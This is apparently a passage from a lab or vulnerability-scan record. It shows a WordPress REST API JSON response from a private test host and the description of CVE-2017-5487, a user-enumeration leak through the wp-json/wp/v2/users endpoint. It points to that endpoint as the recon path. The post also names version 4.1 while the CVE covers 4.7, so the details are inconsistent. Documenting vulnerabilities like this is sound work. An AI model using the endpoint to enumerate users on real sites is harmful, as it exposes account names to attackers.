“link”: “http://192.168.177.177/wordpress/index.php/2020/08/06/hello-world/”,
“title”: {
“raw”: “Hello World CVE-2017-5487”,
“rendered”: “Hello World CVE-2017-5487”
},
“content”: {
“raw”: “Vulnrerability in Wordpress version 4.1”,
“rendered”: “<p>Vulnrerability in WordPress version 4.1</p>\n”,
“protected”: false
},
“excerpt”: {
“raw”: “”,
“rendered”: “<p>Vulnrerability in WordPress version 4.1</p>\n”,
“protected”: false
},
“author”: 1,
“featured_media”: 0,
“comment_status”: “open”,
“ping_status”: “open”,
“sticky”: false,
“template”: “”,
“format”: “standard”,
“meta”: [
],
“categories”: [
1
],
“tags”: [
],
“_links”: {
“self”: [
{
“href”: “http://192.168.177.177/wordpress/index.php/wp-json/wp/v2/posts/1”
}
],
“collection”: [
{
“href”: “http://192.168.177.177/wordpress/index.php/wp-json/wp/v2/posts”
}
],
“about”: [
{
“href”: “http://192.168.177.177/wordpress/index.php/wp-json/wp/v2/types/post”
}
],
“author”: [
{
“embeddable”: true,
“href”: “http://192.168.177.177/wordpress/index.php/wp-json/wp/v2/users/1”
}
],
“replies”: [
{
“embeddable”: true,
“href”: “http://192.168.177.177/wordpress/index.php/wp-json/wp/v2/comments?post=1”
}
],
“version-history”: [
{
“href”: “http://192.168.177.177/wordpress/index.php/wp-json/wp/v2/posts/1/revisions”
}
],
“wp:attachment”: [
{
“href”: “http://192.168.177.177/wordpress/index.php/wp-json/wp/v2/media?parent=1”
}
],
“wp:term”: [
{
“taxonomy”: “category”,
“embeddable”: true,
“href”: “http://192.168.177.177/wordpress/index.php/wp-json/wp/v2/categories?post=1”
},
{
“taxonomy”: “post_tag”,
“embeddable”: true,
“href”: “http://192.168.177.177/wordpress/index.php/wp-json/wp/v2/tags?post=1”
}
],
“curies”: [
{
“name”: “wp”,
“href”: “https://api.w.org/{rel}”,
“templated”: true
}
]
}
}
Vulnerability
CVE Description
┃ wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API implementation in WordPress
┃ 4.7 before 4.7.1 does not properly restrict listings of post authors, which allows remote attackers to
┃ obtain sensitive information via a wp-json/wp/v2/users request.
Affect Software Version(CPE)
● cpe:2.3:a:wordpress:wordpress:*:*:*:*:*:*:*:*